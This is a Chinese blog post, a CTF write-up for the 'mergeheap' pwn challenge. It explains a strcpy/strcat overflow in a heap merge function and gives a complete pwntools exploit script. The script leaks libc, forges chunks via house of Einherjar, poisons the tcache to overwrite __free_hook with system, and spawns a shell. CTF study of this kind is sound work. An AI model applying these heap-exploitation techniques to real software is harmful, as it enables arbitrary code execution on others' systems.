mergeheap

最新推荐文章于 2024-08-02 16:59:58 发布
最新推荐文章于 2024-08-02 16:59:58 发布
阅读量192 收藏
点赞数
分类专栏: pwn 二进制漏洞 CTF 文章标签: 安全 PWN CTF 二进制漏洞 缓冲区溢出
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/seaaseesa/article/details/105590786
版权
pwn 同时被 3 个专栏收录
161 篇文章 24 订阅
订阅专栏
二进制漏洞
161 篇文章 9 订阅
订阅专栏
CTF
161 篇文章 9 订阅
订阅专栏

mergeheap

首先,检查一下程序的保护机制

然后,我们用IDA分析一下,在合并的时候,存在溢出,strcpy、strcat可能会将下一个chunk的size也拷贝过来,从而可以溢出修改下一个chunk的size。

并且,由于merge的时候使用的是strcpy、strcat,遇到\0字符会截断,因此当我们写64位地址数据的时候,需要从最后一个开始写,前面全部用不截断的字符填充。依次从后往前完成64位数据的布置。通过伪造chunk,利用house of Einherjar,形成overlap chunk后,修改tcache bin chunk的next指针,达到任意地址分配。

#coding:utf8
from pwn import *

#sh = process('./mergeheap')
sh = remote('node3.buuoj.cn',29551)
libc = ELF('/lib/x86_64-linux-gnu/libc-2.27.so')
malloc_hook_s = libc.symbols['__malloc_hook']
free_hook_s = libc.symbols['__free_hook']
system_s = libc.sym['system']

def add(size,content):
   sh.sendlineafter('>>','1')
   sh.sendlineafter('len:',str(size))
   sh.sendafter('content:',content)

def show(index):
   sh.sendlineafter('>>','2')
   sh.sendlineafter('idx:',str(index))

def delete(index):
   sh.sendlineafter('>>','3')
   sh.sendlineafter('idx:',str(index))

def merge(index1,index2):
   sh.sendlineafter('>>','4')
   sh.sendlineafter('idx1:',str(index1))
   sh.sendlineafter('idx2:',str(index2))

#0
add(0x80,'a'*0x80)
#1~7
for i in range(7):
   add(0x80,'b'*0x80)
#8
add(0x80,'c'*0x80)
#9
add(0x100,'d'*0x100)
#10
add(0x80,'e'*0x80)
#11
add(0x10,'f'*0x10)
#12
add(0x10,'e'*0x10)
delete(12)
delete(11)
#泄露堆地址
add(0,'') #11
show(11)
heap_addr = u64(sh.recv(6).ljust(8,'\x00'))
print 'heap_addr=',hex(heap_addr)
add(0,'') #12
#7个进tcache
for i in range(1,8):
   delete(i)
#得到unsorted bin
delete(0)
#泄露地址
add(0,'') #0
show(0)
main_arena_xx = u64(sh.recv(6).ljust(8,'\x00'))
malloc_hook_addr = (main_arena_xx & 0xFFFFFFFFFFFFF000) + (malloc_hook_s & 0xFFF)
libc_base = malloc_hook_addr - malloc_hook_s
free_hook_addr = libc_base + free_hook_s
system_addr = libc_base + system_s
print 'libc_base=',hex(libc_base)
print 'free_hook_addr=',hex(free_hook_addr)
print 'system_addr=',hex(system_addr)

####第一次,我们修改size######
#1
add(0x80,'b'*(0x80 - 1) + p8(0x90))
#2
add(0x88,'b'*0x88)
#9放入0x110的tcache bin
delete(9)
#3,合并后,会修改9的size
merge(2,1)
#将chunk8的index换到4来
delete(8)
add(0x80,'c'*0x80) #4

#清空chunk8某处8字节数据
def clearChunk8(offset):
   for i in range(7,-1,-1):
      delete(4)
      add(0x80,'b'*offset + 'b'*i + '\n') #4

def writeChunk8(offset,data):
   delete(4)
   add(0x80,'b'*offset + p64(data)[0:7] + '\n') #4

#清空后一个堆里某处8字节数据
def clearLast(offset):
   for i in range(7,-1,-1):
      #将1、2重新返回tcache bin
      delete(2)
      delete(1)
      #释放0x110的chunk
      delete(3)
      #1
      add(0x80,'b'*offset + 'b'*i + '\n')
      #2
      add(0x88,'b'*0x88)
      #3
      merge(2,1)

def writePrevSize(data):
   #将1、2重新返回tcache bin
   delete(2)
   delete(1)
   #释放0x110的chunk
   delete(3)
   #1
   add(0x80,'b'*(0x80 - 9) + p64(data) + '\n')
   #2
   add(0x88,'b'*0x88)
   #3
   merge(2,1)

####第二次,我们用同样的方法修改prev_size#####
#先清空prev_size处的数据
clearLast(0x80 - 9)
#现在,写prev_size
writePrevSize(0x110 + 0x80)
#我们要在chunk8里伪造一个chunk
#伪造bk
clearChunk8(0x18)
writeChunk8(0x18,heap_addr - 0x250)
#伪造fd
clearChunk8(0x10)
writeChunk8(0x10,heap_addr - 0x250)
#伪造size
clearChunk8(0x8)
writeChunk8(0x8,0x80 + 0x111)
delete(1)
delete(2)
#unsorted bin合并,形成overlap chunk
delete(10)
#0x110的chunk放入tcache bin
delete(3)
#1
add(0x70,'c'*0x70)
#与0x110的chunk重合
add(0x70,p64(free_hook_addr) + '\n')
add(0x100,'/bin/sh\x00\n') #2
#申请到free_hook处
add(0x100,p64(system_addr) + '\n')
#getshell
delete(2)

sh.interactive()

 

ha1vk
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
project-mergeheap
weixin_34050389的博客
01-11 157
ordinary heap merge #include <stdio.h> #include <stdlib.h> #include <time.h>/*time functions library*/ #ifndef _Heap_H #define Max_Size (100000)/*the array-size of heap*/ ...
EPI (Heap) Merge Multiple sorted arrays.
ActiveCoder的博客
05-08 569
#include #include #include using namespace std; /* Write a program that takes an input a set of sorted sequences and compute the union of these sequences as a sorted sequence. For example:
heapq.merge() --合并多个有序序列,再对整个有序序列进行迭代
Jack的博客
10-03 887
问题:我们有一组有序序列,想对它们合并在一起之后的有序序列进行迭代 使用heapq.merge()函数来解决这个问题 import heapq a = [1, 3, 7, 10] b = [2, 5, 6, 11] for c in heapq.merge(a, b): print(c) 1 2 3 5 6 7 10 11 总结: 1、...
hwb_2019_mergeheap
z1r0的博客
04-10 165
hwb_2019_mergeheap 查看保护 利用str的特性遇见\x00会被截断 攻击思路:2.27下泄露lib需要填满7个再释放的时候就是进unsortedbin了。利用strcat将下一个堆块的size都复制过来,形成堆块重叠,然后任意地址写,改hook为one_gadget, from pwn import * context(arch='amd64', os='linux', log_level='debug') file_name = './z1r0' li = lambda x :
buuctf magicheap
qq_42728977的博客
04-22 215
主要是unsorted bin 在拖链的时候的一些细节 参考
huffmantree
04-25
- 函数声明:如`createNode`(创建新节点)、`insertHeap`(插入节点到最小堆)、`mergeHeap`(合并两个最小节点)、`generateCode`(生成哈夫曼编码)等。 - 主函数:`main`函数中调用上述函数,读取输入文本,进行...
护网杯2019 mergeheap --pwn
weixin_30552811的博客
09-08 248
护网 又是签到 一天 这道题一开始 不懂得如何泄露 libc 信息,就蒙了 后来群里师傅也是刚刚好 做出 到这里 我就接着做了 。 先看下保护,发现 全开了 然后 就看下流程 大概 就是添加 chunk show 合并两个chunk 可利用的 洞就是 int merge() { int v1; // ST1C_4...
mergeHeapQuickSort - 三种基础排序算法对比
cxy_hust的博客
03-07 424
三种基础排序 归并排序 堆排序 快速排序 1 题目: https://leetcode-cn.com/problems/sort-an-array/ 2 解题思路: 1 分别详细解释 快速排序,归并排序,堆排序 1.1 快速排序 算法核心:选择一个数字,然后将比他大的都移动到他左边,比他小的都是右边,然后分别对左侧区域和右侧区域递归执行即可 速度和稳定性:在单调情况下达到最坏,为O(n**2),不稳定的原因,中枢元素会和最后一个比他小的数字交换位置(以此将左侧分为比他小的,右侧比他大的); 1
ciscn_2019_final_5
z1r0的博客
02-28 240
ciscn_2019_final_5 查看保护 当index为16的时候,经过运算保存的地址为0x20其实也就是heap的初初始地址+0x20。一开始没怎么看懂这些逻辑然后看了一下ha1vk的wp就懂了(XD 攻击思路:因为16的时候在堆的+0x20,所以只需要在堆里伪造一个堆块,然后释放再申请就可以改下面的一些堆块,把下面的堆块释放掉之后通过伪造的堆来改他们的fd达到任意地址申请即可。具体的tcache dup看z1r0’s blog from pwn import * context(arch=
攻防世界PWN之1000levels题解
seaaseesa的博客
11-09 946
1000levevls 本题是一个栈溢出题,难点在于开启了PIE,因此里面的函数地址是随机的。 溢出点在这里 让我们看看提示功能的函数 看看它的汇编代码 不管条件是否成立,system的地址都会保存到这个函数的rbp-110h处,也就是当前函数的栈顶。 我们再看看这个函数 我们进去看看 如果我们输入的levels大于0,v7才有初始化,那么,如果没有初始化,...
Android的jni的应用C,C++(基本类型,数组,类(结构体)).源码
05-09
主要是在android中调用C、C++的方法,在网上也搜集了一些文档,源码等资料,非常感谢网友的提供的宝贵经验。 也是写下这个文章,希望可以帮助正在做这方面应用网友们,jni使用c语言。
ciscn_final_4(反调试+在栈上伪造堆chunk)
seaaseesa的博客
04-30 1120
ciscn_final_4 首先,检查一下程序的保护机制,没开PIE 沙箱禁用了execve,因此不能getshell,只能构造ROP来读取flag 然后,我们用IDA分析一下 Delete功能没有清空堆指针,存在UAF可以造成double free new功能可以自由控制大小 程序一开始,我们可以在栈里输入一些数据,因此,我们可以在栈里伪造一个chunk,然后利用fa...
【攻防世界】Recho
weixin_43960998的博客
03-28 676
1.程序逆向 简单,略 2.漏洞利用 这道题想了半天,没想明白怎么退出循环,所以看了 ha1vk 师傅博客,学习了一波。 退出循环主要是利用 pwntools 提供的一个功能:shutdown。这个功能可以关闭流,这样就可以退出循环了。     因为对于有些系统,system 可以用系统调用,但是有些不行,所以这里采用 orw 的方式读取 flag。 shift + f12 可以看到 flag 字符串,所以也可能是提示我们。 题目中有了 read,write 可以使用
关于分区有序数据merge的解决方案
liguogangde的专栏
10-30 831
一,基本概念   什么是分区数据?如果一张表被水平切分,比如切分成100张相同的表。通过sharding策略把数据分别存放在这100张表中,那么称这100张表的每一张表为一个分区。它们共同组成了这个同类型的数据表。    提供一个例子供以后分析 如: 1,user表分成100个region 2,sharding策略:按照user_id%100决定放到哪个分区。 3,user表有一个ag
一些知识点总结(HeapSort, MergeSort, QuickSort, PrefixTree, TopologicalSort)
通往梦想
01-01 1178
HeapSort package RandomPractice; public class HeapSort { public static int heapSize = 0; public static void buildHeap(int[] A){ heapSize = A.length; for(int i = A.length / 2 - 1; i >= 0; i--)
鸿蒙系统开发【加解密】安全
2301_76813281的博客
08-02 607
本示例使用cryptoFramework接口的Cipher对象相关方法实现了字符串加解密算法,包括RSA加密算法与AES加密算法。
鸿蒙系统开发【加解密算法库框架】安全
最新发布
2301_76813281的博客
08-02 495
本示例使用@ohos.security.cryptoFramework相关接口实现了对文本文件的加解密、签名验签操作。
发送邮箱调用接口时需要注意哪些安全事项?
DengHua2203的博客
08-02 276
发送邮箱调用接口时,确保安全性是一个复杂而重要的任务。通过以上措施,可以显著提高接口的安全性。AokSend,发送邮箱调用接口,API与SMTP无缝对接,一键触发,邮件秒达,营销快人一步!
二项队列的建立c语言
11-10
*root = mergeHeap(*root, newHeapRoot); // 合并二项堆,更新根节点指针 } ``` 然后,需要实现二项队列的出队操作。出队操作需要找到具有最小关键字的节点,并从根节点链表中删除该节点,再将其子节点们合并到一...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值